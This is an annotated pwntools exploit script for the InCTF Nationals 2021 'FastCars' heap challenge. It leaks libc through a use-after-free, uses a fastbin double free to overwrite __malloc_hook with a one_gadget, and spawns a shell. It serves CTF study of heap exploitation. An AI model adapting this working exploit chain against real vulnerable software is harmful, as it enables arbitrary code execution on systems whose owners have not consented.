FastCars - InCTF Nationals 2021
from pwn import *

# Target binary plus the libc it ships with. Every hard-coded offset further
# down (unsorted-bin head, one_gadget, fake-chunk distance from __malloc_hook)
# is specific to this 64-bit glibc 2.23 build and must be recomputed elsewhere.
context.binary = elf = ELF("./FastCars")
libc = ELF("./libc-2.23.so")
context.log_level = "debug"  # echo every byte exchanged; lower to "info" once stable
p = process("./FastCars")
# Menu option number -> request size handed to malloc; helpers take the size
# and translate it back to the option index.
size2make = [0, 0x18, 0x68, 0x1f8]
def alloc(size, data):
    """Menu option 1: allocate a chunk of ``size`` bytes filled with ``data``.

    ``size`` must be one of the entries of ``size2make`` -- the menu is driven
    by the option index, not the byte count -- otherwise ``list.index`` raises
    ``ValueError``. Returns the slot index the binary prints after the
    allocation.
    """
    p.sendlineafter("> ", "1")
    option = size2make.index(size)
    p.sendlineafter("> ", "{}".format(option))
    p.sendlineafter("Car: ", data)
    p.recvuntil("Index: ")
    # NOTE(review): only one character is consumed, so a slot index >= 10 would
    # be truncated; this exploit never gets that far, but widen the read before
    # reusing the helper in a longer chain.
    return int(p.recv(1))
def free(index):
    """Menu option 2: free the chunk stored in slot ``index``.

    The exploit below frees the same slot twice and reads a slot after freeing
    it, so the binary presumably neither clears the pointer nor marks the slot
    dead -- that missing bookkeeping is the primitive everything else rests on.
    """
    p.sendlineafter("> ", "2")
    p.sendlineafter("Index: ", "{}".format(index))
def leak(index):
    """Menu option 3: print slot ``index`` and stop right before its contents.

    Consumes output up to and including the ``"Model:\\n "`` banner; the caller
    reads the raw bytes that follow (used on a freed slot to read heap
    metadata).
    """
    p.sendlineafter("> ", "3")
    p.sendlineafter("Index: ", "{}".format(index))
    p.recvuntil("Model:\n ")
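# --- 1. libc leak via use-after-free -----------------------------------------
# A 0x1f8 request is far above the fastbin range, so freeing it places the
# chunk in the unsorted bin with fd/bk pointing into main_arena; the binary
# still prints the freed slot, which leaks that pointer. `b` sits between `a`
# and the top chunk so `a` is not merged into it on free.
# Payloads are bytes so the same script runs under Python 2 and 3 pwntools
# (str + p64() output is a TypeError on Python 3).
a = alloc(0x1f8, b"AAA")
b = alloc(0x18, b"X")
free(a)
leak(a)
# 0x3c4b78 is the unsorted-bin head (main_arena + 0x58) in this libc-2.23 build.
libc.address = unpack(p.recv(6), 48) - 0x3c4b78
if libc.address & 0xfff:
    # A base that is not page aligned means the leak or the offset is wrong;
    # stop here rather than let the fastbin write below hit a random address.
    log.error("bad libc leak: base " + hex(libc.address) + " is not page aligned")
log.info("Libc -> " + hex(libc.address))

# --- 2. targets --------------------------------------------------------------
# Fake fastbin chunk just below __malloc_hook. At __malloc_hook-0x23 the size
# field (fake_chunk+8) overlaps the high byte of a libc pointer and reads as
# 0x7f, which the 2.23 fastbin size check accepts for the 0x70 bin used here;
# confirm the byte in gdb if porting to another libc build.
fake_chunk = libc.symbols["__malloc_hook"] - 0x23
log.info("Fake Chunk -> " + hex(fake_chunk))
# one_gadget for this libc-2.23 build:
#   0xf1247  execve("/bin/sh", rsp+0x70, environ)
#   constraint: [rsp+0x70] == NULL
one_gadget = libc.address + 0xf1247
log.info("one_gadget -> " + hex(one_gadget))

# --- 3. fastbin double free -> malloc returns fake_chunk ----------------------
c = alloc(0x68, b"")
d = alloc(0x68, b"")
e = alloc(0x18, b"")  # spacer; never touched again
# glibc 2.23 only compares a freed fastbin chunk against the bin head, so
# freeing d in between lets c be freed twice: bin is now c -> d -> c.
free(c)
free(d)
free(c)
# Take c back and overwrite its fd with fake_chunk. The next two allocations
# return d and c again, and the fourth one hands out fake_chunk itself.
f = alloc(0x68, p64(fake_chunk))
g = alloc(0x68, b"")
h = alloc(0x68, b"")
# User data of fake_chunk starts at __malloc_hook-0x13, so 0x13 bytes of
# padding put one_gadget exactly on __malloc_hook. The trailing zeros do not
# reach the stack: they continue from __malloc_hook+8 into the memory right
# after it (presumably the start of main_arena in this libc). The author
# reports them as needed for the [rsp+0x70]==NULL constraint -- verify in gdb
# before changing the length (total write is 0x63 bytes, within the 0x68 request).
i = alloc(0x68, b"X" * 0x13 + p64(one_gadget) + b"\x00" * 0x48)

# --- 4. trigger: any malloc now goes through __malloc_hook -------------------
p.sendlineafter("> ", "1")
p.sendlineafter("> ", "1")
p.interactive()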